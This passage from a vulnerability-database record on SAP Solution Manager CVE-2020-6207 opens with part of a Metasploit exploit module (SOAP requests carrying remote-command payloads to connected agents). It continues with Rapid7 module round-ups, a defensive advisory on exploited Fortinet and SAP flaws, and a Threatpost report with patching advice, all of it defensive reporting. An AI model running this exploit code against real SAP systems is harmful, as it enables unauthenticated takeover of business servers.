'https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf'],\r\n ['URL', 'https://github.com/chipik/SAP_EEM_CVE-2020-6207']\r\n ],\r\n 'Privileged' => false,\r\n 'Targets' => [\r\n [\r\n 'Linux',\r\n {\r\n 'Arch' => [ARCH_X64, ARCH_X86],\r\n 'Platform' => 'linux',\r\n 'CmdStagerFlavor' => ['printf', 'echo', 'bourne']\r\n }\r\n ],\r\n [\r\n 'Windows',\r\n {\r\n 'Arch' => [ARCH_X64, ARCH_X86],\r\n 'Platform' => 'win',\r\n 'CmdStagerFlavor' => ['certutil', 'vbs', 'debug_write', 'debug_asm']\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => '2020-10-03'\r\n )\r\n )\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(50000),\r\n OptString.new('TARGETURI', [true, 'Path to the SAP Solution Manager EemAdmin page from the web root', '/EemAdminService/EemAdmin']),\r\n OptString.new('AGENT', [true, 'Agent server name for exploitation', 'agent_server_name']),\r\n ]\r\n )\r\n end\r\n\r\n def setup_variables\r\n @host = datastore['RHOSTS']\r\n @port = datastore['RPORT']\r\n @path = datastore['TARGETURI']\r\n\r\n @agent_name = datastore['AGENT']\r\n @script_name = Rex::Text.rand_text_alphanumeric(12)\r\n\r\n if datastore['SSL']\r\n @schema = 'https://'\r\n else\r\n @schema = 'http://'\r\n end\r\n\r\n @solman_uri = \"#{@schema}#{@host}:#{@port}#{@path}\"\r\n end\r\n\r\n def execute_command(cmd, _opts = {})\r\n setup_variables\r\n\r\n vprint_status(\"Start script: #{@script_name} with RCE payload on agent: #{@agent_name}\")\r\n send_soap_request(make_soap_body(@agent_name, @script_name, make_rce_payload(cmd)))\r\n\r\n vprint_status(\"Stop script: #{@script_name} on agent: #{@agent_name}\")\r\n stop_script_in_agent(@agent_name, @script_name)\r\n\r\n vprint_status(\"Delete script: #{@script_name} on agent: #{@agent_name}\")\r\n delete_script_in_agent(@agent_name, @script_name)\r\n end\r\n\r\n # Report Service and Vulnerability\r\n def report_service_and_vuln\r\n report_service(\r\n host: @host,\r\n port: @port,\r\n name: 'soap',\r\n proto: 'tcp',\r\n info: 'SAP Solution Manager'\r\n )\r\n report_vuln(\r\n host: @host,\r\n port: @port,\r\n name: name,\r\n refs: references\r\n )\r\n end\r\n\r\n def check\r\n setup_variables\r\n begin\r\n agents = make_agents_array\r\n rescue RuntimeError\r\n return Exploit::CheckCode::Safe\r\n end\r\n if agents.empty?\r\n print_status(\"Solution Manager server: #{@host}:#{@port} is vulnerable but no agents are connected!\")\r\n else\r\n print_good(\"Successfully retrieved agent list:\\n#{pretty_agents_table(agents)}\")\r\n end\r\n report_service_and_vuln\r\n Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n def exploit\r\n setup_variables\r\n check_agent(@agent_name)\r\n\r\n print_status(\"Enable EEM on agent: #{@agent_name}\")\r\n enable_eem(@agent_name)\r\n\r\n report_service_and_vuln\r\n execute_cmdstager\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-06] #", "sourceHref": "https://0day.today/exploit/36039", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-04-09T20:50:41", "description": "## Spilling the (Gi)tea\n\n\n\nWe have two modules coming in from [cdelafuente-r7](<https://github.com/cdelafuente-r7>) targeting [CVE-2020-14144](<https://attackerkb.com/topics/ZTlYBaSclN/cve-2020-14144?referrer=blog>) for both the Gitea and Gogs self-hosted Git services. \nBoth modules are similar: they take advantage of a user\u2019s ability to create Git hooks by authenticating with the web interface, creating a dummy repository with the aforementioned git hook, and triggering it\u2014which will execute the payload!\n\n## Apache OFBiz Deserialization\n\nHere we have [wvu-r7](<https://github.com/wvu-r7>) and [zeroSteiner](<https://github.com/zeroSteiner>) joining forces to bring us a module targeting [CVE-2021-26295](<https://attackerkb.com/topics/gPRJEi19sG/cve-2021-26295?referrer=blog>). \nThis module takes advantage of an unauthenticated SOAP interface in the Apache OFBiz application that accepts and deserializes an arbitrary Java object which leads to remote code execution.\n\n## New Modules (4)\n\n * [Apache OFBiz SOAP Java Deserialization](<https://github.com/rapid7/metasploit-framework/pull/14971>) by wvu, Spencer McIntyre, and yumusb: This adds an exploit module that targets Apache OFBiz versions prior to `v17.12.06`, which are vulnerable to a Java deserialization vulnerability. By sending a serialized payload to the `webtools/control/SOAPService` endpoint, unauthenticated remote code execution as the user running the Apache OFBiz service can be achieved.\n * [Gitea and Gogs Git Hooks Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/14978>) by Christophe De La Fuente and Podalirius: This adds two modules, `exploit/multi/http/gitea_git_hooks_rce` and `exploit/multi/http/gogs_git_hooks_rce` that both leverage a git hooks setting to achieve authenticated remote code execution against vulnerable versions of Gitea and Gogs respectively. With valid credentials and the permission to create git hooks, both modules create a repo and upload a payload as a `post-receive` hook. Upon creating an additional file in the repo, the `post-receive` hook will be triggered, which will grant code execution as the user running the software.\n * [Diagnostics Agent in Solution Manager, stores unencrypted credentials for Solution Manager server](<https://github.com/rapid7/metasploit-framework/pull/14965>) by Vladimir Ivanov and Yvan Genuer: This adds a new post module that leverages an insecure password storage vulnerability identified as CVE-2019-0307 to retrieve credentials such as SLD user connection and Solman user communication. This also improves the cve_2020_6207_solman_rce auxiliary module by adding a new SECTORE action performing the same attack remotely by leveraging an authentication bypass identified as CVE-2020-6207.\n\n## Enhancements and features\n\n * [#14813](<https://github.com/rapid7/metasploit-framework/pull/14813>) from [bcoles](<https://github.com/bcoles>): This updates the `exploit/windows/http/dupscts_bof` module by including coverage for six more vulnerable versions of the Dup Scout Enterprise software, leveraging auto-targeting, and adding module traits and references.\n\n## Bugs Fixed\n\n * [#14975](<https://github.com/rapid7/metasploit-framework/pull/14975>) from [timwr](<https://github.com/timwr>): This fixes an issue in `cve_2020_1054_drawiconex_lpe` module, which was throwing an exception when the target was not vulnerable.\n * [#14987](<https://github.com/rapid7/metasploit-framework/pull/14987>) from [dwelch-r7](<https://github.com/dwelch-r7>): Fixes an issue where users where only getting three attempts at brute forcing via `mysql_login` module.\n * [#14992](<https://github.com/rapid7/metasploit-framework/pull/14992>) from [jmartin-r7](<https://github.com/jmartin-r7>): Updates the auto_target_host logic to additionally handle rhost being nil\n * [#14998](<https://github.com/rapid7/metasploit-framework/pull/14998>) from [wvu-r7](<https://github.com/wvu-r7>): Changes CVE references from CVE Details to NVD\n * [#14873](<https://github.com/rapid7/metasploit-framework/pull/14873>) from [dwelch-r7](<https://github.com/dwelch-r7>): Fixes an issue where individual modules that failed to load would stop the remaining modules from loading successfully when running the `show payloads` command or `msfvenom -l payloads`\n * [#14988](<https://github.com/rapid7/metasploit-framework/pull/14988>) from [h00die](<https://github.com/h00die>): A fix to validation of custom wordlist values restores auxiliary cracker module functions when no custom wordlist file is supplied.\n * [#14991](<https://github.com/rapid7/metasploit-framework/pull/14991>) from [jra89](<https://github.com/jra89>): Fixes a regression that caused the NTP protocol fuzzer modules to crash when being used\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.38...6.0.39](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-04-01T08%3A47%3A57-05%3A00..2021-04-07T13%3A51%3A53-05%3A00%22>)\n * [Full diff 6.0.38...6.0.39](<https://github.com/rapid7/metasploit-framework/compare/6.0.38...6.0.39>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-04-09T19:17:46", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-0307", "CVE-2020-14144", "CVE-2020-6207", "CVE-2021-26295"], "modified": "2021-04-09T19:17:46", "id": "RAPID7BLOG:5469B2F04F34A9BFD78A364ECC4F941F", "href": "https://blog.rapid7.com/2021/04/09/metasploit-wrap-up-106/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-02T20:50:20", "description": "## Sprinkle on the Modules\n\n\n\n \nThe first quarter of 2021 has given us wave after wave of Exchange vulnerabilities, and while our awesome contributors helped us continue coverage with another Exchange module we were able to add to Metasploit, we also added modules covering very heavy-hitting vulnerabilities in F5, SAP, and SaltStack that may have gotten less notice in the shadow of the Exchange vulnerabilities earlier this quarter. This update offers two new modules from community contributor Vladimir Ivanov targeting remote code execution vulnerabilities in SAP, a new module by our own Will Vu covering a remote code execution vulnerability in F5 Big-IP and BIG-IQ devices that gives root access, and a new module by Metasploit team-member Chrisophe De La Fuente covering a remote code execution in Salt Stack also yielding root access. Then, to top it off, community contributor Erik Wynter contributed a scanner module to identify Nagios XI applications and suggest possible exploit modules that may work on the identified targets!\n\n## Search your Feelings\u2026 and POSIX filesystems!\n\nOur own [space-r7](<https://github.com/space-r7>) added the fs_search function into our Mettle payloads (A.K.A. POSIX Meterpreter). You can now search target filesystems just as you can with the Windows Meterpreter!\n\n## New Modules (6)\n\n * [SAP Solution Manager remote unauthorized OS commands execution](<https://github.com/rapid7/metasploit-framework/pull/14924>) by Dmitry Chastuhin, Pablo Artuso, [Vladimir Ivanov](<https://github.com/Vladimir-Ivanov-Git>), and Yvan Genuer, which exploits [CVE-2020-6207](<https://attackerkb.com/topics/CjM1DUFUOx/cve-2020-6207?referrer=blog>) This PR adds two modules to exploit a vulnerability in the SAP Solution Manager application. Successful exploitation of the vulnerability enables unauthenticated remote attackers to achieve SSRF and execute OS commands from the agent connected within the context of the application.\n * [Nagios XI Scanner](<https://github.com/rapid7/metasploit-framework/pull/14697>) by [Erik Wynter](<https://github.com/kalba-security>), which exploits [CVE-2020-35578](<https://attackerkb.com/topics/ftmpf6wgqi/cve-2020-35578?referrer=blog>) A new set of libraries have been added to support developers wishing to target Nagios XI machines, which should help to supply developers with several commonly used pieces of functionality. Additionally a scanner module has been added which will scan Nagios XI installations and try to detect the version installed. Once the version of Nagios XI has been obtained, it will then suggest exploits in Metasploit that can be used to exploit that version of Nagios XI, if any exploits are available.\n * [F5 iControl REST Unauthenticated SSRF Token Generation RCE](<https://github.com/rapid7/metasploit-framework/pull/14935>) by wvu and Rich Warren, which exploits [CVE-2021-22986](<https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986?referrer=blog>) This adds a module that exploits an unauthenticated SSRF vulnerability in F5's iControl REST API that is then leveraged to execute code as the `root` user on various versions of F5's BIG-IP and BIG-IQ devices.\n * [SaltStack Salt API Unauthenticated RCE through wheel_async client](<https://github.com/rapid7/metasploit-framework/pull/14950>) by Alex Seymour and [Christophe De La Fuente](<https://github.com/cdelafuente-r7>), which exploits [CVE-2021-25282](<https://attackerkb.com/topics/HtY90kt4ZL/cve-2021-25282?referrer=blog>) This adds an exploit module that exploits an authentication bypass and a directory traversal vulnerability in versions `3002.5` and below of SaltStack Salt's REST API. Remote code execution as the `root` user is achieved by writing a custom grain module to the extension module directory and waiting until a recurring maintenance check executes the malicious grain module.\n * [Windows Gather Exchange Server Mailboxes](<https://github.com/rapid7/metasploit-framework/pull/14869>) by [SophosLabs Offensive Security team](<https://github.com/sophosyaniv>). This PR adds a module for enumerating end extracting mailboxes on Exchange servers.\n\n## Enhancements and features\n\n * [#14937](<https://github.com/rapid7/metasploit-framework/pull/14937>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) Improves the performance of the various `show` commands within the console. For instance `show exploits` now takes ~0.5 seconds instead of ~14 seconds\n * [#14945](<https://github.com/rapid7/metasploit-framework/pull/14945>) from [mekhalleh](<https://github.com/mekhalleh>) This updates the ProxyLogon RCE module to use an RPC request to identify the backend server's FQDN.\n * [#14951](<https://github.com/rapid7/metasploit-framework/pull/14951>) from [timwr](<https://github.com/timwr>) This updates the Linux Meterpreter implementation to support the `search` command which allows users to search for files on a compromised system.\n\n## Bugs Fixed\n\n * [#14918](<https://github.com/rapid7/metasploit-framework/pull/14918>) from [zeroSteiner](<https://github.com/zeroSteiner>) Fixes an issue where the `VHOST` option was not being correctly populated when the `RHOST` option was specified with domain names.\n * [#14962](<https://github.com/rapid7/metasploit-framework/pull/14962>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) Updates the `nexpose_connect` login functionality to correctly handle the `@` symbol being present in the password\n * [#14966](<https://github.com/rapid7/metasploit-framework/pull/14966>) from [ryanpohlner](<https://github.com/ryanpohlner>) This improves the ProxyLogon RCE module to address an issue where a payload would be run twice.\n * [#14969](<https://github.com/rapid7/metasploit-framework/pull/14969>) from [timwr](<https://github.com/timwr>) This fixes a bug in the Python Meterpreter's DNS resolving function.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.37...6.0.38](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-03-25T11%3A07%3A15-05%3A00..2021-04-01T08%3A47%3A57-05%3A00%22>)\n * [Full diff 6.0.37...6.0.38](<https://github.com/rapid7/metasploit-framework/compare/6.0.37...6.0.38>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-04-02T19:49:02", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-35578", "CVE-2020-6207", "CVE-2021-22986", "CVE-2021-25282"], "modified": "2021-04-02T19:49:02", "id": "RAPID7BLOG:764CA6BDCBE5F8F001B5E508AE0659CC", "href": "https://blog.rapid7.com/2021/04/02/metasploit-wrap-up-105/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-08T18:54:35", "description": "\n\n_The following blog was co-authored by Caitlin Condon and [Bob Rudis](<https://blog.rapid7.com/author/bob-rudis>), also known (in his own words) as \u201csome caveman from Maine.\u201d_\n\nLast week, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the FBI [published a joint alert](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/02/fbi-cisa-joint-advisory-exploitation-fortinet-fortios>) to warn users that APT threat actors were likely exploiting unpatched Fortinet FortiOS devices to gain initial access to government, commercial, technology, and other organizations\u2019 networks. The alert highlighted three FortiOS vulnerabilities, all of which were previously known, and at least one of which (CVE-2018-13379) has been broadly exploited for more than 18 months. This week, CISA [published an additional alert](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/06/malicious-cyber-activity-targeting-critical-sap-applications>) amplifying a threat report from security firm Onapsis, which describes [ongoing attacks against SAP applications](<https://onapsis.com/active-cyberattacks-mission-critical-sap-applications>).\n\nRapid7 has previously analyzed a number of the highest-severity vulnerabilities enumerated in this latest set of alerts. The CVEs included in these reports have been detailed below, along with recommendations for organizations seeking to defend themselves against ongoing exploitation. Notably, none of these vulnerabilities are new\u2014many of them are a year or more old, which underscores the need for a regular patch cycle, as well as a defined patch cycle exception process.\n\n## FortiOS vulnerabilities\n\nFortinet devices are what we call **network pivots**\u2014that is, the position they occupy in organizations\u2019 networks gives external attackers the ability to access internal networks if exploited successfully, which in turn allows for a range of secondary attacks and other nefarious activities. If at all possible, defenders should strongly consider implementing a \u201czero-day\u201d patch cycle for internet-exposed and other network pivot products, including (but not only) Fortinet and other VPNs. InsightVM and Nexpose customers can assess their exposure to all three FortiOS CVEs below with vulnerability checks.\n\n * CVE-2018-13379 is a pre-authentication information disclosure vulnerability that arises from a path traversal flaw in the web portal component of FortiOS SSL VPNs. The vulnerability allows external attackers to download FortiOS system files through specially crafted HTTP resource requests and has been [exploited in the wild since 2019](<https://us-cert.cisa.gov/ncas/current-activity/2019/10/04/vulnerabilities-exploited-multiple-vpn-applications>). Read our [full analysis of CVE-2018-13379 and its history here](<https://attackerkb.com/topics/VEc81wfDS7/cve-2018-13379-path-traversal-in-fortinet-fortios?referrer=blog#rapid7-analysis>).\n * [CVE-2019-5591](<https://attackerkb.com/topics/sWpteHiN5z/cve-2019-5591?referrer=blog>) is a default configuration vulnerability in FortiOS that allows an unauthenticated attacker on the same subnet to intercept sensitive information by impersonating the LDAP server.\n * [CVE-2020-12812](<https://attackerkb.com/topics/8qnr47UsVL/cve-2020-12812?referrer=blog>) is an improper authentication vulnerability in SSL VPN in FortiOS 6.4.0, 6.2.0 to 6.2.3, 6.0.9 and below that gives a user the ability to log in successfully without being prompted for the second factor of authentication (FortiToken) if that user changes the case of their username.\n\nSince the beginning of March, Rapid7 Labs' Heisenberg Honeypot fleet has seen nearly 60 IP addresses attempting common, known single `GET` request exploits against Fortinet devices (we\u2019ve grouped the IP addresses up to the hosting provider/ISP level):\n\n\n\nUnfortunately, our fleet does not emulate Fortinet devices. Since these devices are fairly easy to distinguish on the internet (nearly 1 million of them in the image, below)\u2014due to the common, vendor SSL certificate they use\u2014it is surprising to see opportunistic exploit attempts versus just inventory/discovery scans.\n\nOver 1 million Fortinet devices discovered by the latest Project Sonar scans (geolocated with MaxMind)\n\nThat last sentence should help organizations underscore why CISA and the FBI raised the Fortinet exploitation campaign to the level of a joint alert: Attackers can easily identify legitimate Fortinet endpoints on the internet, and it takes virtually no time from discovery to exploit if a target system is not patched and configured properly.\n\nOn April 3, 2021, Fortinet published [a post on patch and vulnerability management](<https://www.fortinet.com/blog/psirt-blogs/patch-vulnerability-management>) where they outlined their emergency response and patch release practices new alignment to ISO standards and further emphasized the need to keep internet-exposed Fortinet devices patched. They have a special knowledge base article on [how to keep notified about Fortinet patch releases](<https://kb.fortinet.com/kb/microsites/search.do?cmd=displayKC&docType=kc&externalId=FD50697&sliceId=1&docTypeID=DT_KCARTICLE_1_1&dialogID=184200521&stateId=1%200%20184202090%27>) and provide multiple ways for organizations to say current on Fortinet security updates. \n\nAs Fortinet notes in that post, these weaknesses have had patches available for quite some time, so if you\u2019re just getting around to fixing them, you may need to dedicate some further cycles to some forensic activity, as it is very likely one or more attackers have already taken advantage of these vulnerabilities.\n\nTo learn more about other vulnerabilities that functioned as network pivots for attackers, read [Rapid7\u2019s 2020 Vulnerability Intelligence Report](<https://www.rapid7.com/research/report/vulnerability-intelligence-report/>).\n\n## Actively exploited SAP vulnerabilities\n\nThe two most recent SAP vulnerabilities detailed in Onapsis\u2019 threat report are CVE-2020-6287, a CVSS-10 vulnerability in the SAP NetWeaver Application Server (AS) Java component LM Configuration Wizard that has been actively exploited in the wild since July 2020, and SAP Solution Manager CVE-2020-6207. Both of these vulnerabilities allow broad compromise of SAP applications and environments.\n\n * CVE-2020-6287 is present by default in SAP applications running on top of SAP NetWeaver AS Java 7.3 and any newer versions (up to SAP NetWeaver 7.5). It allows remote, unauthenticated attackers to exploit and fully compromise vulnerable SAP installations. Exploitation of CVE-2020-6287 through the HTTP interface allows for modification or extraction of highly sensitive information and disruption of critical business processes. For a list of affected applications and additional guidance, read Rapid7\u2019s [full analysis here](<https://attackerkb.com/topics/JubO1RiVBP/cve-2020-6287-critical-vulnerability-in-sap-netweaver-application-server-as-java?referrer=blog#rapid7-analysis>).\n * CVE-2020-6207 arises from a missing authentication check in version 7.2 of SAP\u2019s Solution Manager product, allowing attackers to completely compromise all SMDAgents connected to the Solution Manager. \nSAP customers should pay close attention to their access logs and monitor for unauthorized user account creation; they should also ensure that web services in general do not run using privileged accounts. InsightVM and Nexpose customers can assess their risk to CVE-2020-6287 with a remote vulnerability check. A check for CVE-2020-6207 is currently under development.\n\nOther SAP vulnerabilities noted as being exploited in the wild include:\n\n * CVE-2018-2380 affects SAP CRM versions 7.01, 7.02, 7.30, 7.31, 7.33, and 7.54. The vulnerability allows an attacker to exploit insufficient validation of path information provided by users, letting characters representing &quot;traverse to parent directory&quot; pass through to the file APIs.\n * CVE-2016-9563 is a vulnerability in SAP NetWeaver Application Server (AS) Java 7.5 that allows remote authenticated users to conduct XML External Entity (XXE) attacks via the sap.com~tc~bpem~him~uwlconn~provider~web/bpemuwlconn URI.\n * CVE-2016-3976 is a directory traversal vulnerability in SAP NetWeaver AS Java 7.1 through 7.5 that allows remote attackers to read arbitrary files via a ..\\ (dot dot backslash) in the fileName parameter to `CrashFileDownloadServlet`.\n * CVE-2010-5326 is a CVSS-10 vulnerability in the `Invoker` Servlet on SAP NetWeaver Application Server Java platforms that arises from a lack of authentication and allows remote attackers to execute arbitrary code via an HTTP or HTTPS request. It was used in attacks from 2013 to 2016.\nAttackers have used these vulnerabilities to establish persistence, escalate privileges, and evade detection. It is also possible that threat actors may build exploit chains that extend access beyond SAP applications to underlying operating systems. Further information and recommendations is [available from Onapsis here](<https://www.onapsis.com/active-cyberattacks-mission-critical-sap-applications>). \n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2021-04-08T17:18:07", "type": "rapid7blog", "title": "Attackers Targeting Fortinet Devices and SAP Applications", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-5326", "CVE-2016-3976", "CVE-2016-9563", "CVE-2018-13379", "CVE-2018-2380", "CVE-2019-5591", "CVE-2020-12812", "CVE-2020-6207", "CVE-2020-6287"], "modified": "2021-04-08T17:18:07", "id": "RAPID7BLOG:5109AC30126DB59333F13ED32F7F4713", "href": "https://blog.rapid7.com/2021/04/08/attackers-targeting-fortinet-devices-and-sap-applications/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-04-07T18:10:44", "description": "Active cyberattacks on known vulnerabilities in SAP systems could lead to full control of unsecured SAP applications, researchers are warning.\n\nAdversaries are carrying out a range of attacks, according to [an alert](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/06/malicious-cyber-activity-targeting-critical-sap-applications>) from SAP and security firm Onapsis issued Tuesday \u2013 including theft of sensitive data, financial fraud, disruption of mission-critical business processes and other operational disruptions, and delivery of ransomware and other malware.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nSAP applications help organizations manage critical business processes \u2013 including enterprise resource planning (ERP), product lifecycle management, customer relationship management (CRM) and supply-chain management.\n\nFrom mid-2020 until today, Onapsis researchers have recorded more than 300 successful exploit attempts on unprotected SAP instances.\n\n## Who\u2019s at Risk?\n\nUnfortunately, the ongoing attacks could have far-reaching consequences, as SAP noted in the warning:\n\n\u201cThese are the applications that 92 percent of the Forbes Global 2000 have standardized on SAP to power their operations and fuel the global economy,\u201d the alert noted. \u201cWith more than 400,000 organizations using SAP, 77 percent of the world\u2019s transactional revenue touches an SAP system. These organizations include the vast majority of pharmaceutical, critical infrastructure and utility companies, food distributors, defense and many more.\u201d\n\nGovernment agencies should take particular notice of the spate of attacks, researchers said.\n\n\u201cSAP systems are a prominent attack vector for bad actors,\u201d Kevin Dunne, president at Pathlock, told Threatpost. \u201cMost federal agencies are running on SAP, as it has become the industry standard for government entities. However, these SAP implementations are often on-premise, and managed by the government entities themselves due to security concerns. These systems then become increasingly vulnerable when updates and patches are not applied in a timely fashion, leaving them wide open for interested hackers.\u201d\n\nThe technology sector is another hot target for attacks, according to Setu Kulkarni, vice president of strategy at WhiteHat Security.\n\n\u201cOur reporting has found that independent software vendors (ISVs) and technology companies have and inordinately high window of exposure,\u201d he told Threatpost. \u201cWe are seeing that ISVs and technology companies are lacking in their security rigor as they ultimately may pass on the security responsibilities to the companies that use the ISV to build products for their customers.\u201d\n\n## **Active Exploitation**\n\nThe attacks are brute-forcing high-privilege SAP user accounts, as well as exploiting a raft of known bugs: [CVE-2020-6287](<https://nvd.nist.gov/vuln/detail/CVE-2020-6287>), [CVE-2020-6207](<https://nvd.nist.gov/vuln/detail/CVE-2020-6207>), [CVE-2018-2380](<https://nvd.nist.gov/vuln/detail/CVE-2018-2380>), [CVE-2016-9563](<https://nvd.nist.gov/vuln/detail/CVE-2016-9563>), [CVE-2016-3976](<https://nvd.nist.gov/vuln/detail/CVE-2016-3976>) and [CVE-2010-5326](<https://nvd.nist.gov/vuln/detail/CVE-2010-5326>), according to the warning.\n\nThe adversaries are \u201cadvanced threat actors,\u201d according to Onapsis, as evidenced by how quickly they\u2019ve been able to develop exploits, among other things.\n\nThere is \u201cconclusive evidence that cyberattackers are actively targeting and exploiting unsecured SAP applications, through a varied set of techniques, tools and procedures and clear indications of sophisticated knowledge of mission-critical applications,\u201d the alert reads. \u201cThe window for defenders is significantly smaller than previously thought, with examples of SAP vulnerabilities being weaponized in less than 72 hours since the release of patches, and new unprotected SAP applications provisioned in cloud (IaaS) environments being discovered and compromised in less than three hours.\u201d\n\n\n\nSource: Onapsis.\n\nThe issues are as follows:\n\n * CVE-2020-6287 is a [critical authentication bypass issue](<https://threatpost.com/critical-sap-bug-enterprise-system-takeover/157392/>) in SAP NetWeaver Application Server Java allowing full account takeover;\n * CVE-2020-6207 is another critical authentication bypass bug, in SAP Solution Manager;\n * CVE-2018-2380 is a medium-severity flaw in SAP CRM, which allows an attacker to exploit insufficient validation of path information provided by users;\n * CVE-2016-9563 is also a medium-severity bug, this time in SAP NetWeaver AS Java. Remote authenticated users can exploit it to conduct XML External Entity (XXE) attacks, which allow them to interfere with XML processing;\n * CVE-2016-3976 is a high-severity directory traversal vulnerability in SAP NetWeaver AS Java that allows remote attackers to read arbitrary files;\n * And CVE-2010-5326 is an 11-year-old critical issue in the Invoker Servlet on SAP NetWeaver AS Java. It doesn\u2019t require authentication, which allows remote attackers to execute arbitrary code via an HTTP or HTTPS request.\n\n\n\nExploit uses \u2013 click to enlarge. Source: Onapsis.\n\nAfter initial access, Onapsis observed threat actors using the vulnerabilities to establish persistence, for privilege escalation, evasion and, ultimately, complete control of SAP systems, including financial, human capital management and supply-chain applications.\n\n\u201cAdditionally, attempts at chaining vulnerabilities to achieve privilege escalation for OS-level access were observed, expanding potential impact beyond SAP systems and applications,\u201d according to the analysis.\n\nAs an example, Onapsis said that one actor was able to scan and create an admin user utilizing an exploit utility for CVE-2020-6287. Upon successfully creating the profile and logging in, additional exploits were executed against CVE-2018-2380 for shell upload, as the attackers tried to access the operating system layer. Following that, exploits for CVE-2016-3976 were executed, targeting the download of a \u201ccredential store,\u201d which provides access to logins for high-privileged accounts and the core database. Worryingly, this all happened within 90 minutes, according to Onapsis.\n\n\n\nExploit chaining. Source: Onapsis.\n\nInterestingly, the cyberattackers in some cases are patching the exploited vulnerabilities after they\u2019ve gained access to a victim\u2019s environment, Onapsis said.\n\n\u201cThis action illustrates the threat actors\u2019 advanced domain knowledge of SAP applications, access to the manufacturer\u2019s patches and their ability to reconfigure these systems,\u201d according to the firm. \u201cThis technique is often used by threat actors to deploy backdoors on seemingly patched systems to maintain persistence or to evade detection.\u201d\n\n## **Who\u2019s Behind the SAP Attacks?**\n\nThe activity is being mounted by multiple groups, who appear to be engaged in coordinated activity across vast swathes of infrastructure, according to the alert.\n\n\u201cAttackers [are] triggering exploitation from different source systems from the ones used to perform subsequent manual logins were detected, indicating the possibility of coordinated groups and/or actors leveraging wide-spread attack infrastructure,\u201d it reads. \u201cWhile this behavior is common when analyzing operating system and network-based attacks, this data provides evidence that the same approach is also used when targeting mission-critical applications, as these actors use TOR nodes and distributed VPS infrastructures to launch the attacks and escalate privileges.\u201d\n\nThe activity is originating from all over the world, including Hong Kong, India, Japan, the Netherlands, Singapore, South Korea, Sweden, Taiwan, United States, Vietnam and Yemen.\n\n## **How Can I Prevent an Attack?**\n\nThe main way to thwart these kinds of attacks is to patch the vulnerabilities. Also, any web-facing accounts should have unique passwords to disallow automated brute-force attempts to break in; and any systems that don\u2019t need to face the public web should be taken offline.\n\n\u201cAll observed exploited critical weaknesses have been promptly patched by SAP, and have been available to customers for months and years in some cases,\u201d the alert noted. \u201cUnfortunately, both SAP and Onapsis continue to observe many organizations that have still not applied the proper mitigations\u2026allowing unprotected SAP systems to continue to operate and, in many cases, remain visible to attackers via the internet.\u201d\n\nAlso, while applying security patches in a timely fashion is critical to closing down the risk from major, known vulnerabilities, Pathlock\u2019s Dunne pointed out that patching can only remedy issues that are in the rear-view. With cyberattackers patching the bugs behind them, there also needs to be a way to detect malicious activity.\n\n\u201cFor a comprehensive, forward looking approach to SAP security, organizations need to implement a comprehensive solution to monitor user activities within the system, including interactions with sensitive data,\u201d he told Threatpost. \u201cThis way, even attackers that are able to breach SAP systems by known or unknown vulnerabilities can still be identified and their damage can be mitigated in real-time.\u201d\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _****_[FREE Threatpost event](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _****_[Register here](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_ for the Wed., April 21 LIVE event. _**\n", "cvss3": {}, "published": 